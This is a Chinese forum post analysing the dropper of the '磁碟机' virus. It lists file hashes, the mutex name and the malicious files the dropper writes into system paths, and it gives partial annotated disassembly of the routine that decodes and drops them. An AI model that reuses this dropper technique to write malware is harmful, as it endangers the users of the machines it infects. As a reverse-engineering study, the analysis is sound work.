文件: Setup.exe
大小: 159744 字节
修改时间: 2008年2月25日, 02:46:28
MD5: E4284D269C5FE7C4F3D1EF9D24AE2077
SHA1: F315C0DE3C095126ED1693F1EC6689F227FFA4E2
CRC32: 80A32F35
加壳:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
编写语言:Microsoft Visual C++ 6.0
写在前面:
花了几天时间,参考了几个高手的分析,才有了这个残篇,在这里表示感谢轩辕小聪(答阳光,关于pagefile_pif对付安全软件行为的实现举例),loveboom(熊猫烧香病毒分析及解决方案),孤独更可靠(磁碟机变种简单分析(lsass.exe、smss.exe、dnsq.dll、NetApi000.sys),清新阳光(新年伊始警惕“磁碟机”新变种(LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif)(征集更好的查杀方法)
学习过程中还有很多很多东西还是不明不白了,估计有很多地方跟出来可能还是错的,只有慢慢来了,虽然这只是残篇,权作自我激励吧,以下就是本篇的主要内容
1.CreateMutexA创建一个互斥变量,判断病毒是否已经存在内存中
复制内容到剪贴板
代码:
.text:004057FC 68 E0 C7 40 00 push offset s_Cnjbla ; "CNJBla"
.text:00405801 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405804 C6 45 FC 3A mov byte ptr [ebp+var_4], 3Ah
.text:00405808 E8 C3 20 00 00 call CString::operator=(char const *)
.text:00405808
.text:0040580D 68 D8 C7 40 00 push offset s_Ipboff ; "ipbofF"
.text:00405812 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405815 E8 CE 20 00 00 call CString::operator+=(char const *)
.text:00405815
.text:0040581A FF 75 90 push [ebp+var_70] ; lpName
.text:0040581D 6A 01 push 1 ; bInitialOwner
.text:0040581F 53 push ebx ; lpMutexAttributes
.text:00405820 FF 15 A4 90 40 00 call ds:CreateMutexA ; |pSecurity = NULL
.text:00405820 ; |InitialOwner = TRUE
.text:00405820 ; \MutexName = "CNJBlaipbofF"
.text:004058202.释放文件(有几个跟丢了 ^_^ )
病毒主要是读取自身的资源,然后释放出来害人,以下是资源和文件的对照复制内容到剪贴板
代码:
\ResourceType = "sexe"
|ResourceName = C4=196号资源
|FileName = "C:\winnt\system32\com\smss.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexa"
|ResourceName = C0=192号资源
|FileName = "C:\winnt\system32\com\netcfg.000"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
resouse=sexh
|FileName = "C:\winnt\system32\com\lsass.exe"
\ResourceType = "sexs"
|ResourceName = C2=194号资源
|FileName = "C:\NetApi000.sys"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexp"
|ResourceName = C1=193号资源
|FileName = "c:\pagefile.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexh"
|ResourceName = C3=195号资源
|FileName = "C:\winnt\system32\dnsq.dll"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL具体实现的反汇编代码,FindResourceA获取资源,SizeofResource 计算资源的大小,LoadResource 来装载获取的资源,WriteFile写入吧 ^_^复制内容到剪贴板
代码:
..text:00403B42 68 C4 C6 40 00 push offset s_Sexe ; "sexe"
.text:00403B47 E8 CC 3D 00 00 call CString::CString(char const *)
.text:00403B47
.text:00403B4C 68 C4 00 00 00 push 0C4h ; hObject
.text:00403B51 51 push ecx ; lpFileName
.text:00403B52 8D 45 08 lea eax, [ebp+lpFileName]
.text:00403B55 8B CC mov ecx, esp
.text:00403B57 89 65 EC mov [ebp+var_14], esp
.text:00403B5A 50 push eax
.text:00403B5B C6 45 FC 01 mov byte ptr [ebp+var_4], 1
.text:00403B5F E8 72 3D 00 00 call CString::CString(CString const &)
.text:00403B5F
.text:00403B64 80 65 FC 00 and byte ptr [ebp+var_4], 0
.text:00403B68 8B CE mov ecx, esi
.text:00403B6A E8 99 F7 FF FF call process_resources
.text:00403308 process_resources proc near ; CODE XREF: sub_403B09+61�p
.text:00403308 ; sub_403DF4+7B3�p
.text:00403308 ; sub_403DF4+10DD�p
.text:00403308 ; sub_403DF4+18A4�p
.text:00403308 ; sub_403DF4+1DAB�p
.text:00403308
.text:00403308 NumberOfBytesWritten= dword ptr -14h
.text:00403308 hResData= dword ptr -10h
.text:00403308 var_C= dword ptr -0Ch
.text:00403308 var_4= dword ptr -4
.text:00403308 lpFileName= dword ptr 8
.text:00403308 hObject= dword ptr 0Ch
.text:00403308 lpType= dword ptr 10h
.text:00403308
.text:00403308 B8 84 81 40 00 mov eax, offset __ehhandler$?CreateNewChild@CMDIFrameWnd@@QAEPAVCMDIChildWnd@@PAUCRuntimeClass@@IPAUHMENU__@@PAUHACCEL__@@@Z
.text:0040330D E8 AE 46 00 00 call _EH_prolog
.text:0040330D
.text:00403312 51 push ecx
.text:00403313 51 push ecx
.text:00403314 53 push ebx
.text:00403315 56 push esi
.text:00403316 57 push edi
.text:00403317 33 FF xor edi, edi
.text:00403319 89 7D FC mov [ebp+var_4], edi
.text:0040331C 0F B7 45 0C movzx eax, word ptr [ebp+hObject]
.text:00403320 FF 75 10 push [ebp+lpType] ; lpType
.text:00403323 50 push eax ; lpName
.text:00403324 57 push edi ; hModule
.text:00403325 FF 15 64 90 40 00 call ds:FindResourceA ; |hModule = NULL
.text:00403325 ; |ResourceName = C4
.text:00403325 ; \ResourceType = "sexe"
.text:00403325 ;
.text:00403325
.text:0040332B 8B D8 mov ebx, eax
.text:0040332D 3B DF cmp ebx, edi
.text:0040332F 0F 84 CA 00 00 00 jz loc_4033FF
.text:0040332F
.text:00403335 53 push ebx ; hResInfo
.text:00403336 57 push edi ; hModule
.text:00403337 FF 15 70 90 40 00 call ds:SizeofResource ; |hModule = NULL
.text:00403337 ; \hResource = 0040F0C8
.text:00403337 ;
.text:00403337
.text:0040333D 53 push ebx ; hResInfo
.text:0040333E 57 push edi ; hModule
.text:0040333F 8B F0 mov esi, eax
.text:00403341 FF 15 68 90 40 00 call ds:LoadResource ; |hModule = NULL
.text:00403341 ; \hResource = 0040F188
.text:00403341
.text:00403347 3B C7 cmp eax, edi ; edi=00000000
.text:00403347 ; eax=00415890 (Setup.00415890)
.text:00403347 ;
.text:00403349 89 45 F0 mov [ebp+hResData], eax
.text:0040334C 0F 84 AD 00 00 00 jz loc_4033FF
.text:0040334C
.text:00403352 57 push edi ; hTemplateFile
.text:00403353 57 push edi ; dwFlagsAndAttributes
.text:00403354 6A 02 push 2 ; dwCreationDisposition
.text:00403356 57 push edi ; lpSecurityAttributes
.text:00403357 57 push edi ; dwShareMode
.text:00403358 68 00 00 00 40 push 40000000h ; dwDesiredAccess
.text:0040335D FF 75 08 push [ebp+lpFileName] ; lpFileName
.text:00403360 FF 15 E0 90 40 00 call ds:CreateFileA ; |FileName = "C:\winnt\system32\com\smss.exe"
.text:00403360 ; |Access = GENERIC_WRITE
.text:00403360 ; |ShareMode = 0
.text:00403360 ; |pSecurity = NULL
.text:00403360 ; |Mode = CREATE_ALWAYS
.text:00403360 ; |Attributes = 0
.text:00403360 ; \hTemplateFile = NULL
.text:00403360
.text:00403366 3B C7 cmp eax, edi ; edi=00000000
.text:00403366 ; eax=000001AC
.text:00403366 ;
.text:00403368 89 45 0C mov [ebp+hObject], eax
.text:0040336B 0F 84 8E 00 00 00 jz loc_4033FF
.text:0040336B
.text:00403371 8B 1D 70 93 40 00 mov ebx, ds:malloc
.text:00403377 56 push esi ; Size=1001 (4097.)
.text:00403378 FF D3 call ebx ; malloc
.text:00403378
.text:0040337A 56 push esi ; Size
.text:0040337B 8B F8 mov edi, eax
.text:0040337D FF D3 call ebx ; malloc
.text:0040337D
.text:0040337F 59 pop ecx
.text:00403380 8B D8 mov ebx, eax
.text:00403382 85 FF test edi, edi
.text:00403384 59 pop ecx
.text:00403385 74 76 jz short loc_4033FD
.text:00403385
.text:00403387 85 DB test ebx, ebx
.text:00403389 74 72 jz short loc_4033FD
.text:00403389
.text:0040338B 56 push esi ; Size= 1001 (4097.)
.text:0040338C FF 75 F0 push [ebp+hResData] ; hResData=Handles = 415890 (4282512.)
.text:0040338F FF 15 6C 90 40 00 call ds:LockResource
.text:0040338F
.text:00403395 50 push eax ; Src=Setup.00415890
.text:00403396 53 push ebx ; Dst=00348060
.text:00403397 E8 3C 46 00 00 call memcpy ; |dest = 00348060
.text:00403397 ; |src = Setup.00415890
.text:00403397 ; \n = 1001 (4097.)
.text:00403397 ;
.text:00403397
.text:0040339C 83 C4 0C add esp, 0Ch
.text:0040339F 33 C9 xor ecx, ecx
.text:004033A1 85 F6 test esi, esi
.text:004033A3 76 0F jbe short loc_4033B4
.text:004033A3
.text:004033A5 8D 44 33 FF lea eax, [ebx+esi-1]
.text:004033A5
.text:004033A9
.text:004033A9 loc_4033A9: ; CODE XREF: process_resources+AA�j
.text:004033A9 8A 10 mov dl, [eax] ; ds:[00349060]=0D (Carriage Return)
.text:004033A9 ; dl=01
.text:004033A9 ;
.text:004033AB 88 14 39 mov [ecx+edi], dl ; dl=0D (Carriage Return)
.text:004033AB ; ds:[01208470]=0D (Carriage Return)
.text:004033AE 41 inc ecx
.text:004033AF 48 dec eax
.text:004033B0 3B CE cmp ecx, esi
.text:004033B2 72 F5 jb short loc_4033A9
.text:004033B2
.text:004033B4
.text:004033B4 loc_4033B4: ; CODE XREF: process_resources+9B�j
.text:004033B4 33 C0 xor eax, eax
.text:004033B6 80 3F 0D cmp byte ptr [edi], 0Dh
.text:004033B9 75 16 jnz short loc_4033D1
.text:004033B9
.text:004033BB 6A 01 push 1
.text:004033BD 59 pop ecx
.text:004033BE 3B F1 cmp esi, ecx
.text:004033C0 8B C1 mov eax, ecx
.text:004033C2 76 0D jbe short loc_4033D1
.text:004033C2
.text:004033C4
.text:004033C4 loc_4033C4: ; CODE XREF: process_resources+C7�j
.text:004033C4 8A 14 39 mov dl, [ecx+edi]
.text:004033C7 F6 D2 not dl
.text:004033C9 88 14 39 mov [ecx+edi], dl
.text:004033CC 41 inc ecx
.text:004033CD 3B CE cmp ecx, esi
.text:004033CF 72 F3 jb short loc_4033C4
.text:004033CF
.text:004033D1
.text:004033D1 loc_4033D1: ; CODE XREF: process_resources+B1�j
.text:004033D1 ; process_resources+BA�j
.text:004033D1 8D 4D EC lea ecx, [ebp+NumberOfBytesWritten]
.text:004033D4 6A 00 push 0 ; lpOverlapped=NULL
.text:004033D6 2B F0 sub esi, eax ; eax=00000001
.text:004033D6 ; esi=00001001
.text:004033D8 51 push ecx ; lpNumberOfBytesWritten=ecx=0012E098
.text:004033D8 ;
.text:004033D9 03 C7 add eax, edi ; edi=01208470
.text:004033D9 ; eax=00000001
.text:004033DB 56 push esi ; nNumberOfBytesToWrite=esi=00001000
.text:004033DC 50 push eax ; lpBuffer=eax=01208471
.text:004033DD FF 75 0C push [ebp+hObject] ; hFile=堆栈 ss:[0012E0B8]=000001AC
.text:004033E0 FF 15 90 90 40 00 call ds:WriteFile ; |hFile = 000001AC
.text:004033E0 ; |Buffer = 01208471
.text:004033E0 ; |nBytesToWrite = 1000 (4096.)
.text:004033E0 ; |pBytesWritten = 0012E098
.text:004033E0
.text:004033E6 57 push edi ; Memory
.text:004033E7 8B F0 mov esi, eax
.text:004033E9 FF 15 78 93 40 00 call ds:free
.text:004033E9
.text:004033EF 59 pop ecx
.text:004033F0 FF 75 0C push [ebp+hObject] ; hObject=堆栈 ss:[0012E0B8]=000001AC
.text:004033F3 FF 15 60 90 40 00 call ds:CloseHandle[
本帖最后由 一把锈剑 于 2008-3-1 15:11 编辑 ]
